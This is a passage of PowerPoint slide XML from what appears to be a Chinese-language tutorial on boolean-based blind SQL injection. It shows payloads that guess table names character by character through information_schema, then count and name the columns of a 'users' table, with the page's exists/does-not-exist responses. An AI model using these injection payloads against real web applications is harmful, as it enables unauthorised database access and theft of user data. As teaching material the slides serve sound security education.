                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>((select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>=database() limit 0,1),1,1))&gt;97 # </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>显示存在</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>((select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>=database() limit 0,1),1,1))&lt;122 # </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>显示存在</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>((select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>=database() limit 0,1),1,1))&lt;109 # </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>显示存在</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>((select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>=database() limit 0,1),1,1))&lt;103 # </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>显示不存在</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>((select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>=database() limit 0,1),1,1))&gt;103 # </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>显示不存在</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0">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775" y="952029"/>
            <a:ext cx="11161240" cy="5170646"/>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第四步：猜解表中的字段名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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首先猜解表中字段的数量：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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’users’)=1#  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</a:t>
            </a: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(select count(</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’users’)=8 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示存在</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说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表有</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个字段。</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775" y="591989"/>
            <a:ext cx="11161240" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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接着挨个猜解字段名：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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 limit 0,1),1))=1 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</a:t>
            </a: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length(</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((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
